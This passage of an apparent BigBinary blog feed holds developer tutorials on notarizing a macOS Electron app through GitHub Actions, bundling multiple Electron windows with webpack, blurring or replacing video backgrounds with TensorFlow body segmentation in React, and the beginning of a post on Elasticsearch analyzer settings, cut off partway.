href="https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution">Notarization</a>is a security feature introduced by Apple to ensure that macOS applications aresafe and free of malicious content. It's an additional layer of security thatbuilds on code-signing. The notarization process involves submitting our app toApple for automated security checks. Once notarized, macOS will recognize theapp as trustworthy, ensuring smooth installation and execution on users'systems, even when downloaded from outside the Mac App Store.</p><p>To notarize, we need to create an &quot;App-specific password&quot;. To create anApp-specific password:</p><ul><li>Sign in to <a href="https://appleid.apple.com/account/home">appleid.apple.com</a></li><li>In the Sign-In and Security section, select App-Specific Passwords.</li><li>Select Generate an app-specific password or select the Add button(+).<img src="/blog_images/2024/code-sign-notorize-mac-desktop-app/app-specific-1.png" alt="app specific password 1"></li><li>Then give a name for the password and click <code>Create</code>.<img src="/blog_images/2024/code-sign-notorize-mac-desktop-app/app-specific-2.png" alt="app specific password 2"></li></ul><p>A new App-Specific Password will be generated. Save it in a safe place. We willuse this password to notarize our macOS application.</p><h3>Update Electron build process</h3><p>Add <code>APPLE_APP_SPECIFIC_PASSWORD</code>, <code>TEAM_ID</code>, and <code>APPLE_ID</code> to GitHub secrets.Then load up these secrets as environment variables along with others in ourGithub Action workflow.</p><pre><code class="language-yml"> - name: Publish releases    env:      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}      AWS_ACCESS_KEY_ID: ${{secrets.AWS_ACCESS_KEY}}      AWS_SECRET_ACCESS_KEY: ${{secrets.AWS_SECRET}}      CSC_CONTENT: ${{ secrets.CSC_CONTENT }}      CSC_KEY_PASSWORD: ${{ secrets.CSC_KEY_PASSWORD }}      TEAM_ID: ${{ secrets.TEAM_ID }}      APPLE_ID: ${{ secrets.APPLE_ID }}      APPLE_APP_SPECIFIC_PASSWORD: ${{ secrets.APPLE_APP_SPECIFIC_PASSWORD }}    run: |      echo &quot;$CSC_CONTENT&quot; | base64 --decode &gt; certificate.p12      export CSC_LINK=&quot;./certificate.p12&quot;      npm exec electron-builder -- --publish always -mwl</code></pre><p>At the time of writing this, we encountered issues with the built-in notarizefeature of <code>electron-builder</code>, so we created a custom script to handle thenotarization process.</p><pre><code class="language-js">const { notarize } = require(&quot;@electron/notarize&quot;);const { build } = require(&quot;../package.json&quot;);const notarizeMacos = async context =&gt; {  const { electronPlatformName, appOutDir } = context;  if (electronPlatformName !== &quot;darwin&quot;) return;  if (process.env.CI !== &quot;true&quot;) {    console.warn(&quot;Skipping notarizing step. Packaging is not running in CI&quot;);    return;  }  const appName = context.packager.appInfo.productFilename;  await notarize({    tool: &quot;notarytool&quot;,    appBundleId: build.appId,    appPath: `${appOutDir}/${appName}.app`,    teamId: process.env.TEAM_ID,    appleId: process.env.APPLE_ID,    appleIdPassword: process.env.APPLE_APP_SPECIFIC_PASSWORD,    verbose: true,  });  console.log(&quot;--- notarization completed ---&quot;);};exports.default = notarizeMacos;</code></pre><p>The script uses the <code>notarize</code> function from the <code>@electron/notarize</code> package.It passes the path to the generated <code>.app</code> file during the build process, alongwith the required <code>TEAM_ID</code>, <code>APPLE_ID</code>, and <code>APPLE_APP_SPECIFIC_PASSWORD</code>,which were obtained earlier.</p><p>To run the custom notarization script, disable the built-in notarization featurein the <code>electron-builder</code> configuration. Then, call this script from the<code>afterSign</code> callback to ensure it runs after the signing process is complete.</p><pre><code class="language-json">&quot;build&quot;: {    &quot;mac&quot;: {      &quot;notarize&quot;: false,      &quot;target&quot;: {        &quot;target&quot;: &quot;default&quot;,        &quot;arch&quot;: [          &quot;arm64&quot;,          &quot;x64&quot;        ]      },    },    &quot;afterSign&quot;: &quot;./scripts/notarize.js&quot;,}</code></pre><p>Great! We have successfully code-signed and notarized our macOS application.Now, macOS will trust our application, and an added benefit of this process isthat it allows us to auto-update our application seamlessly, ensuring that usersalways have the latest version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring webpack to handle multiple browser windows in Electron]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/electron-multiple-browser-windows"/>
      <updated>2024-11-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/electron-multiple-browser-windows</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 4 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When developing desktop applications with Electron, managing multiple browserwindows within a single app is often necessary. Whether we need to displaydifferent types of content or create a more complex user interface, handlingmultiple windows efficiently can be challenging.</p><p>In this blog, we'll explore how to configure Webpack to manage multiple browserwindows in our Electron application, ensuring that each window operates smoothlyin our project.</p><h3>Configuring Webpack for a Single Browser Window</h3><p>Before diving into the setup for multiple windows, let's first review how toconfigure Webpack for a single browser window. This example focuses on therenderer process, which is responsible for rendering the UI and handlinginteractions. If interested in learning how to configure Webpack for the entireElectron app, including the main process, check out<a href="https://www.bigbinary.com/blog/publish-electron-application">this blog</a>.</p><p>Consider the following typical folder structure for an Electron project:</p><pre><code class="language-js">electron-app assets app src    main      main.js    renderer      App.jsx      index.ejs node_modules package.json</code></pre><p>This structure separates the code for the <code>main</code> and <code>renderer</code> processes, whichis a standard practice in Electron projects.</p><p>Here's how we can configure Webpack for a single browser window:</p><pre><code class="language-js">// ./config/webpack/renderer.mjsimport webpack from &quot;webpack&quot;;import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;const configuration = {  target: [&quot;web&quot;, &quot;electron-renderer&quot;],  entry: &quot;src/renderer/App.jsx&quot;,  output: {    path: &quot;app/dist/renderer&quot;,    publicPath: &quot;./&quot;,    filename: &quot;renderer.js&quot;,    library: {      type: &quot;umd&quot;,    },  },  module: {...},  // Module configuration (loaders, etc.)  optimization: {...},  // Optimization settings (minification, etc.)  plugins: [    // Other plugins...    new HtmlWebpackPlugin({      filename: &quot;app.html&quot;,      template: &quot;src/renderer/index.ejs&quot;,    }),  ],};export default configuration;</code></pre><p>In this configuration:</p><ul><li>The <code>target</code> is set to <code>[&quot;web&quot;, &quot;electron-renderer&quot;]</code>, enabling both standardweb and Electron renderer environments.</li><li>The <code>entry</code> specifies the entry point for the renderer process, which is<code>src/renderer/App.jsx</code>.</li><li>The output is bundled into a single file named <code>renderer.js</code>, which is storedin the <code>app/dist/renderer</code> directory. In an Electron app, it's oftenpreferable to bundle everything into a single file since the files are loadedlocally.</li><li>The <code>HtmlWebpackPlugin</code> generates an <code>app.html</code> file from a template(<code>index.ejs</code>), embedding the necessary script to load <code>renderer.js</code>.</li></ul><p>We can compile and bundle our frontend code using the following command:</p><pre><code class="language-bash">webpack --config ./config/webpack/renderer.mjs</code></pre><p>This will produce an <code>app.html</code> file in the <code>app/dist/renderer</code> directory, alongwith <code>renderer.js</code>.</p><pre><code class="language-html">&lt;!DOCTYPE html&gt;&lt;html&gt;   &lt;head&gt;      &lt;meta charset=utf-8&gt;      &lt;meta http-equiv=Content-Security-Policy content=&quot;script-src 'self' 'unsafe-inline'&quot;&gt;      &lt;title&gt;MyApp&lt;/title&gt;      &lt;script defer=defer src=./renderer.js&gt;&lt;/script&gt;   &lt;/head&gt;   &lt;body&gt;      &lt;div id=root&gt;&lt;/div&gt;   &lt;/body&gt;&lt;/html&gt;</code></pre><p>The <code>HtmlWebpackPlugin</code> correctly injects the <code>&lt;script/&gt;</code> tag to load<code>renderer.js</code>. This <code>app.html</code> can now be loaded into a browser window from the<code>main</code> process.</p><pre><code class="language-js">const appWindow = new BrowserWindow({  show: false,  width: 1408,  height: 896,});appWindow.loadURL(&quot;app/dist/renderer/app.html&quot;);appWindow.on(&quot;ready-to-show&quot;, () =&gt; {  appWindow.show();});</code></pre><h3>Configuring Webpack for Multiple Browser Windows</h3><p>With the single window setup complete, let's add another browser window to theapp. For example, let's say we want to create a <code>Settings.jsx</code> component withinthe renderer folder:</p><pre><code class="language-js">electron-app assets app src    main      main.js    renderer      App.jsx      Settings.jsx      index.ejs node_modules package.json</code></pre><p>Previously, we bundled all JavaScript code into a single <code>renderer.js</code> file.However, since we're now working with multiple windows, it makes sense to createseparate bundles for each windowone for the <code>App</code> window and another for the<code>Settings</code> window. To achieve this, we can specify multiple entry points inWebpack:</p><pre><code class="language-js">// ./config/webpack/renderer.mjsimport webpack from &quot;webpack&quot;;import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;const configuration = {  target: [&quot;web&quot;, &quot;electron-renderer&quot;],  entry: {    app: &quot;src/renderer/App.jsx&quot;,    settings: &quot;src/renderer/Settings.jsx&quot;,  },  output: {    path: &quot;app/dist/renderer&quot;,    publicPath: &quot;./&quot;,    filename: &quot;[name].js&quot;, // Use placeholders to generate separate bundles    library: {      type: &quot;umd&quot;,    },  },  // Other configuration options...};export default configuration;</code></pre><p>In this configuration:</p><ul><li>The <code>entry</code> property now contains two entry points: <code>app</code> and <code>settings</code>.Webpack will generate separate bundles for each, named <code>app.js</code> and<code>settings.js</code> respectively.</li><li>The <code>filename</code> in the <code>output</code> section uses the <code>[name]</code> placeholder todynamically generate filenames based on the entry point names.</li></ul><p>Next, we need to generate two HTML filesone for each window. We can achievethis by adding another instance of <code>HtmlWebpackPlugin</code> to the <code>plugins</code> array:</p><pre><code class="language-js">// ./config/webpack/renderer.mjsimport webpack from &quot;webpack&quot;;import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;const configuration = {  target: [&quot;web&quot;, &quot;electron-renderer&quot;],  entry: {    app: &quot;src/renderer/App.jsx&quot;,    settings:&quot;src/renderer/Settings.jsx&quot;  },  output: {    path: &quot;app/dist/renderer&quot;,    publicPath: &quot;./&quot;,    filename: '[name].js',    library: {      type: &quot;umd&quot;,    },  },  module: {...},  optimization: {...},  plugins: [    // Other plugins...    new HtmlWebpackPlugin({      filename: &quot;app.html&quot;,      template: &quot;src/renderer/index.ejs&quot;,      chunks: ['app'],  // Load only the 'app' bundle    }),    new HtmlWebpackPlugin({      filename: &quot;settings.html&quot;,      template: &quot;src/renderer/index.ejs&quot;,      chunks: ['settings'],  // Load only the 'settings' bundle    }),  ],};export default configuration;</code></pre><p>By specifying the <code>chunks</code> property for each <code>HtmlWebpackPlugin</code> instance, weensure that each HTML file only includes the appropriate JavaScript bundle. Thefinal output will include two HTML files:</p><pre><code class="language-html">&lt;!-- app.html --&gt;&lt;!DOCTYPE html&gt;&lt;html&gt;   &lt;head&gt;      &lt;meta charset=utf-8&gt;      &lt;meta http-equiv=Content-Security-Policy content=&quot;script-src 'self' 'unsafe-inline'&quot;&gt;      &lt;title&gt;MyApp&lt;/title&gt;      &lt;script defer=defer src=./app.js&gt;&lt;/script&gt;   &lt;/head&gt;   &lt;body&gt;      &lt;div id=root&gt;&lt;/div&gt;   &lt;/body&gt;&lt;/html&gt;&lt;!-- settings.html --&gt;&lt;!DOCTYPE html&gt;&lt;html&gt;   &lt;head&gt;      &lt;meta charset=utf-8&gt;      &lt;meta http-equiv=Content-Security-Policy content=&quot;script-src 'self' 'unsafe-inline'&quot;&gt;      &lt;title&gt;MyApp&lt;/title&gt;      &lt;script defer=defer src=./settings.js&gt;&lt;/script&gt;   &lt;/head&gt;   &lt;body&gt;      &lt;div id=root&gt;&lt;/div&gt;   &lt;/body&gt;&lt;/html&gt;</code></pre><p>Finally, from the <code>main</code> process, we can easily create two browser windows, eachwith its own renderer code:</p><pre><code class="language-js">const appWindow = new BrowserWindow({  show: false,  width: 1408,  height: 896,});appWindow.loadURL(&quot;app/dist/renderer/app.html&quot;);appWindow.on(&quot;ready-to-show&quot;, () =&gt; {  appWindow.show();});const settingsWindow = new BrowserWindow({  show: false,  width: 1408,  height: 896,});settingsWindow.loadURL(&quot;app/dist/renderer/settings.html&quot;);settingsWindow.on(&quot;ready-to-show&quot;, () =&gt; {  settingsWindow.show();});</code></pre><p>With this setup, each browser window will load its own dedicated JavaScriptbundle, ensuring that our Electron application is both efficient and modular.This approach not only makes our code easier to manage but also enhances theperformance of our application by reducing unnecessary code loading.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Creating blurred or virtual backgrounds in real-time video in React apps]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/video-background-removal"/>
      <updated>2024-11-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/video-background-removal</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 3 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>Modern tools like Zoom and Google Meet allow us to blur or completely replaceour background in real-time video, creating a polished and distraction-freeenvironment regardless of where we are.</p><p>This is possible because of advancements in machine learning. In this blog,we'll explore how to achieve real-time background blurring and replacement usingTensorFlow's body segmentation capabilities.</p><h3>Tensorflow body segmentation</h3><p>TensorFlow body segmentation is a computer vision technique that involvesdividing an image into distinct regions corresponding to different parts of ahuman body. It typically employs deep learning models, such as convolutionalneural networks (CNNs), to analyze an image and predict pixel-level labels.These labels indicate whether each pixel belongs to a specific body part, likethe head, torso, arms, or legs.</p><p>The segmentation process often starts with a pre-trained model, which has beentrained on large datasets. The model processes the input image through multiplelayers of convolutions and pooling, gradually refining the segmentation map. Thefinal output is a precise mask that outlines each body part, allowing forapplications in areas like augmented reality, fitness tracking, and virtualtry-ons.</p><p>To learn more about Tensorflow and body segmentation, check out the belowresources.</p><ul><li><a href="https://www.tensorflow.org/lite/examples/segmentation/overview">TensorFlow segmentation</a></li><li><a href="https://blog.tensorflow.org/2022/01/body-segmentation.html">Body Segmentation with MediaPipe and TensorFlow.js</a></li></ul><h3>Setting up React app</h3><p>We'll create a simple React app that streams video from the webcam.</p><pre><code class="language-js">import React, { useRef, useEffect } from &quot;react&quot;;const App = () =&gt; {  const videoRef = useRef(null);  useEffect(() =&gt; {    const getVideo = async () =&gt; {      try {        const stream = await navigator.mediaDevices.getUserMedia({          video: true,        });        if (videoRef.current) {          videoRef.current.srcObject = stream;        }      } catch (err) {        console.error(&quot;Error accessing webcam: &quot;, err);      }    }    getVideo();    return () =&gt; {      if (videoRef.current &amp;&amp; videoRef.current.srcObject) {        videoRef.current.srcObject.getTracks().forEach(track =&gt; track.stop());      }    };  }, []);  return (    &lt;div&gt;      &lt;video ref={videoRef} autoPlay width=&quot;640&quot; height=&quot;480&quot; style={transform: 'scaleX(-1)'}/&gt;    &lt;/div&gt;  );}export default App;</code></pre><p>In the code above, we render a <code>&lt;video&gt;</code> element, and once the app is mounted,we obtain the video stream from the user's webcam using<code>navigator.mediaDevices.getUserMedia</code>. This call will prompt the user to grantpermission to access their camera. Once the user grants permission, the videostream is captured and rendered in the <code>&lt;video&gt;</code> element.</p><h3>Installing packages</h3><p>Next, let's add the necessary TensorFlow packages.</p><pre><code class="language-bash">yarn add @tensorflow/tfjs-core @tensorflow/tfjs-converter @tensorflow-models/body-segmentation @mediapipe/selfie_segmentation</code></pre><p><code>@tensorflow/tfjs-core</code> is the core JavaScript package for TensorFlow,<code>@tensorflow-models/body-segmentation</code> contains all the functions we need forbody segmentation, and <code>@mediapipe/selfie_segmentation</code> is our pre-trainedmodel.</p><h3>Creating body segmenter</h3><p>The TensorFlow body segmentation package provides a pre-trained<code>MediaPipeSelfieSegmentation</code> model for segmenting the human body in images andvideos. This model is specifically designed for the upper body. If ourrequirement involves the entire body, we may want to consider other models like<a href="https://github.com/tensorflow/tfjs-models/tree/master/body-pix">BodyPix</a>.</p><p>We need to load this model to create a segmenter.</p><pre><code class="language-js">import * as bodySegmentation from &quot;@tensorflow-models/body-segmentation&quot;;const createSegmenter = async () =&gt; {  const model = bodySegmentation.SupportedModels.MediaPipeSelfieSegmentation;  const segmenterConfig = {    runtime: &quot;mediapipe&quot;,    solutionPath: &quot;https://cdn.jsdelivr.net/npm/@mediapipe/selfie_segmentation&quot;,    modelType: &quot;general&quot;,  };  return bodySegmentation.createSegmenter(model, segmenterConfig);};</code></pre><p>We load the model from a CDN, configure the runtime as <code>mediapipe</code>, and set themodelType to <code>general</code>. Then, we create the <code>segmenter</code> using the<code>bodySegmentation.createSegmenter</code> method.</p><pre><code class="language-js">// ./videoBackground.jsimport * as bodySegmentation from &quot;@tensorflow-models/body-segmentation&quot;;const createSegmenter = async () =&gt; {  const model = bodySegmentation.SupportedModels.MediaPipeSelfieSegmentation;  const segmenterConfig = {    runtime: &quot;mediapipe&quot;,    solutionPath: &quot;https://cdn.jsdelivr.net/npm/@mediapipe/selfie_segmentation&quot;,    modelType: &quot;general&quot;,  };  return bodySegmentation.createSegmenter(model, segmenterConfig);};class VideoBackground {  #segmenter;  getSegmenter = async () =&gt; {    if (!this.#segmenter) {      this.#segmenter = await createSegmenter();    }    return this.#segmenter;  };}const videoBackground = new VideoBackground();export default videoBackground;</code></pre><p>Here, we define a <code>VideoBackground</code> class and create an instance of it. Insidethe class, the <code>getSegmenter</code> function ensures that the <code>segmenter</code> is createdonly once, so we don't have to recreate it each time.</p><h3>Blur the video background</h3><p>Before we continue further, let's update our demo app. Since we are going tomodify the video, we need a <code>&lt;canvas/&gt;</code> to display the modified video. Add thatto our demo app.</p><pre><code class="language-js">// rest of the code...const App = () =&gt; {  const canvasRef = useRef();  // rest of the code...  return (    &lt;div&gt;      &lt;video        ref={videoRef}        autoPlay        width=&quot;640&quot;        height=&quot;480&quot;        style={{ display: &quot;none&quot; }}      /&gt;      &lt;canvas ref={canvasRef} width=&quot;640&quot; height=&quot;480&quot; style={transform: 'scaleX(-1)'}/&gt;    &lt;/div&gt;  );}</code></pre><p>Also, hide the <code>&lt;video&gt;</code> element by setting <code>display: &quot;none&quot;</code> since we don'twant to display the raw video.</p><p>Next, create a function within the <code>VideoBackground</code> class to blur the video.</p><pre><code class="language-js">// rest of the code...class VideoBackground {  // rest of the code...  #animationId;  stop = () =&gt; {    cancelAnimationFrame(this.#animationId);  };  blur = async (canvas, video) =&gt; {    const foregroundThreshold = 0.5;    const edgeBlurAmount = 15;    const flipHorizontal = false;    const blurAmount = 5;    const segmenter = await this.getSegmenter();    const processFrame = async () =&gt; {      const segmentation = await segmenter.segmentPeople(video);      await bodySegmentation.drawBokehEffect(        canvas,        video,        segmentation,        foregroundThreshold,        blurAmount,        edgeBlurAmount,        flipHorizontal      );      this.#animationId = requestAnimationFrame(processFrame);    };    this.#animationId = requestAnimationFrame(processFrame);  };}</code></pre><p>The <code>blur</code> function takes <code>video</code> and <code>canvas</code> references. It uses<code>requestAnimationFrame</code> to continuously draw the resulting image onto the<code>canvas</code>. First, it creates a body segmentation using the<code>segmenter.segmentPeople</code> function by passing the video reference. This allowsus to identify which pixels belong to the background and foreground.</p><p>To achieve the blurred effect, we use the <code>bodySegmentation.drawBokehEffect</code>function, which applies a blur to the background pixels. This function acceptsadditional configurations like <code>foregroundThreshold</code>, <code>blurAmount</code>, and<code>edgeBlurAmount</code>, which we can adjust to customize the effect.</p><p>We've also added a <code>stop</code> function to halt video processing by canceling therecursive <code>requestAnimationFrame</code> calls.</p><pre><code class="language-jsx">import React, { useRef, useEffect, useState } from &quot;react&quot;;function App() {  const [cameraReady, setCameraReady] = useState(false);  // rest of the code...  &lt;video    // rest of the code...    onLoadedMetadata={() =&gt; setCameraReady(true)}  /&gt;;  // rest of the code...}</code></pre><p>Before calling the <code>blur</code> function, ensure the video is loaded by waiting forthe <code>onLoadedMetadata</code> event to be triggered.</p><p>All set; let's blur the video background.</p><pre><code class="language-jsx">import React, { useRef, useEffect, useState } from &quot;react&quot;;import videoBackground from &quot;./videoBackground&quot;;function App() {  const [cameraReady, setCameraReady] = useState(false);  const videoRef = useRef(null);  const canvasRef = useRef();  useEffect(() =&gt; {    async function getVideo() {      try {        const stream = await navigator.mediaDevices.getUserMedia({          video: true,        });        if (videoRef.current) {          videoRef.current.srcObject = stream;        }      } catch (err) {        console.error(&quot;Error accessing webcam: &quot;, err);      }    }    getVideo();    return () =&gt; {      if (videoRef.current &amp;&amp; videoRef.current.srcObject) {        videoRef.current.srcObject.getTracks().forEach(track =&gt; track.stop());      }    };  }, []);  useEffect(() =&gt; {    if (!cameraReady) return;    videoBackground.blur(canvasRef.current, videoRef.current);    return () =&gt; {      videoBackground.stop();    };  }, [cameraReady]);  return (    &lt;div className=&quot;App&quot;&gt;      &lt;video        ref={videoRef}        autoPlay        width=&quot;640&quot;        height=&quot;480&quot;        style={{ display: &quot;none&quot; }}        onLoadedMetadata={() =&gt; setCameraReady(true)}      /&gt;      &lt;canvas ref={canvasRef} width=&quot;640&quot; height=&quot;480&quot; /&gt;    &lt;/div&gt;  );}export default App;</code></pre><p>Here, we added another <code>useEffect</code> that triggers when <code>cameraReady</code> is <code>true</code>.Inside this <code>useEffect</code>, we call the <code>videoBackground.blur</code> function, passingthe <code>canvas</code> and <code>video</code> refs. When the component unmounts, we stop the videoprocessing by calling the <code>videoBackground.stop()</code> function.</p><h3>Replace with a virtual background</h3><p>If we feel that just blurring is not enough and want to completely replace thebackground, we need to remove the background from the video and place an<code>&lt;img/&gt;</code> behind the <code>&lt;canvas/&gt;</code>. To remove the background, we can utilize the<code>bodySegmentation.toBinaryMask</code> function. This function will return an<a href="https://developer.mozilla.org/en-US/docs/Web/API/ImageData">ImageData</a> with itsalpha channel being <code>255</code> for the background and <code>0</code> for the foreground. We canuse this info in the original data and set the background pixels' alpha to be<code>transparent</code>.</p><pre><code class="language-js">// rest of the code...class VideoBackground {  // rest of the code...  remove = async (canvas, video) =&gt; {    const context = canvas.getContext(&quot;2d&quot;);    const segmenter = await this.getSegmenter();    const processFrame = async () =&gt; {      context.drawImage(video, 0, 0);      const segmentation = await segmenter.segmentPeople(video);      const coloredPartImage = await bodySegmentation.toBinaryMask(        segmentation      );      const imageData = context.getImageData(        0,        0,        video.videoWidth,        video.videoHeight      );      // imageData format; [R,G,B,A,R,G,B,A...]      // below for loop iterate through alpha channel      for (let i = 3; i &lt; imageData.data.length; i += 4) {        // Background pixel's alpha will be 255.        if (coloredPartImage.data[i] === 255) {          imageData.data[i] = 0; // this is a background pixel's alpha. Make it fully transparent        }      }      await bodySegmentation.drawMask(canvas, imageData);      this.#animationId = requestAnimationFrame(processFrame);    };    this.#animationId = requestAnimationFrame(processFrame);  };}</code></pre><p>Similar to the blurring process, inside <code>processFrame</code>, we first create thesegmentation using <code>segmenter.segmentPeople</code> and convert it to a binary maskusing <code>bodySegmentation.toBinaryMask</code>. We then obtain the original image datawith <code>context.getImageData</code>. Next, we loop through the image data to make thebackground pixels transparent. Finally, we draw the result on the canvas using<code>bodySegmentation.drawMask</code>.</p><p>Before calling this function, let's modify our demo app by adding an option toswitch between <code>none</code>, <code>blur</code>, and <code>image</code> effects, rather than removing theblur function. Additionally, include a background image.</p><pre><code class="language-js">const BACKGROUND_OPTIONS = [&quot;none&quot;, &quot;blur&quot;, &quot;image&quot;];function App() {  const [backgroundType, setBackgroundType] = useState(BACKGROUND_OPTIONS[0]);  // rest of the code...  return (    &lt;div&gt;      // rest of the code...      {backgroundType === &quot;image&quot; &amp;&amp; (        &lt;img          alt=&quot;&quot;          style={{            position: &quot;absolute&quot;,            top: 0,            bottom: 0,            width: &quot;640px&quot;,            height: &quot;480px&quot;,          }}          src=&quot;/bgImage.png&quot;        /&gt;      )}      // rest of the code...      &lt;div&gt;        &lt;select          value={backgroundType}          onChange={e =&gt; setBackgroundType(e.target.value)}        &gt;          {BACKGROUND_OPTIONS.map(option =&gt; (            &lt;option value={option} key={option}&gt;              {option}            &lt;/option&gt;          ))}        &lt;/select&gt;      &lt;/div&gt;    &lt;/div&gt;  );}</code></pre><p>Here, we added a <code>&lt;select&gt;</code> element to choose between <code>none</code>, <code>blur</code>, and<code>image</code>, and an <code>&lt;img&gt;</code> element to display the background image, which willserve as our virtual background.</p><p>All set. Now, let's update the <code>useEffect</code>.</p><pre><code class="language-js">useEffect(() =&gt; {  if (!cameraReady || backgroundType === &quot;none&quot;) return;  const bgFn =    backgroundType === &quot;blur&quot; ? videoBackground.blur : videoBackground.remove;  bgFn(canvasRef.current, videoRef.current);  return () =&gt; {    videoBackground.stop();  };}, [cameraReady, backgroundType]);</code></pre><p>Based on the selection, we will call either <code>videoBackground.blur</code> or<code>videoBackground.remove</code>.</p><p>Full working example can be found in this<a href="https://github.com/bigbinary/tensorflow-body-segmentation-example">Github repo</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Improving search experience using Elasticsearch]]></title>
       <author><name>Sayooj Surendran</name></author>
      <link href="https://www.bigbinary.com/blog/elasticsearch-improvements"/>
      <updated>2024-10-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/elasticsearch-improvements</id>
      <content type="html"><![CDATA[<p>We use Elasticsearch in <a href="https://neeto.com/neetocourse">NeetoCourse</a> for oursearching needs. Recently, we have made some changes to the Elasticsearch config toimprove the search experience. In this blog, we will share the changes we madeand what we learned during the process.</p><h2>Definitions</h2><p>These are some of the Elasticsearch terminology we use in this blog.</p><ul><li><p><strong>Document:</strong> A document in Elasticsearch is similar to a row in a databasetable. It is a collection of key-value pairs.</p></li><li><p><strong>Index:</strong> An index is a collection of documents. It is similar to a databasetable. Indexing is the process of creating the index, and we canconfigure each step of this process.</p></li><li><p><strong>Analyzer:</strong> An analyzer converts a string into a list of searchable tokens.Analyzer contains three functions: Character Filter, Tokenizer, and TokenFilter.</p></li><li><p><strong>Character Filter</strong> is a function that performs the process of filtering outcertain characters from the input string. For example, to strip HTML tags andto get only the body.</p></li><li><p><strong>Tokenizer:</strong> A tokenizer is a function that splits the input string intotokens. This can be based on whitespace, punctuation, or any other character.</p></li><li><p><strong>Token Filter:</strong> A token filter is a function that performs the process offiltering out certain tokens from the input string. For example, it can beused to remove stop words (a, the, and, etc.) which serve no purpose in thesearch.</p></li></ul><h2>Analyzer</h2><p>This is our analyzer setup:</p><pre><code class="language-js">{  default: {    tokenizer: &quot;whitespace&quot;,    filter: [&quot;lowercase&quot;, &quot;autocomplete&quot;]  },  search: {    tokenizer: &quot;whitespace&quot;,    filter: [&quot;lowercase&quot;]  },  english_exact: {    tokenizer: &quot;whitespace&quot;,    filter: [      &quot;lowercase&quot;    ]  }}</code></pre><p><code>default</code> is the analyzer used for indexing and searching. The search terms fromthe user is passed through the <code>search</code> analyzer. <code>english_exact</code> is theanalyzer used for exact matches.</p><h3>Tokenizer</h3><p>By default, Elasticsearch uses the <code>standard</code> tokenizer, which splits the inputstring into tokens based on whitespace, punctuation, and any other character.Since our content is mostly based on technical concepts and programming, wecannot use the <code>standard</code> tokenizer. The <code>whitespace</code> tokenizer splits the inputstring into tokens based on whitespace, which is suitable for our use case.Hence, we use the <code>whitespace</code> tokenizer for all the analyzers.</p><h3>Filter</h3><p>The <code>lowercase</code> filter is used to convert all the tokens to lowercase beforestoring it in the index. This is a common requirement as we want the search tobe case-insensitive. We also use the custom <code>autocomplete</code> filter. Let's see itsdefinition:</p><pre><code class="language-js">{  autocomplete: {    &quot;type&quot;: &quot;edge_ngram&quot;,    &quot;min_gram&quot;: 3,    &quot;max_gram&quot;: 20,    &quot;preserve_original&quot;: true  }}</code></pre><p>The custom <code>autocomplete</code> filter is an implementation of<a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/analysis-edgengram-tokenfilter.html">edge_ngram</a>token filter. Let's see the result of this filter when applied on the phrase&quot;Elephant in the room&quot;.</p><pre><code class="language-js">{  &quot;tokens&quot;: [    {      &quot;token&quot;: &quot;Ele&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elep&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Eleph&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elepha&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elephan&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elephant&quot;,      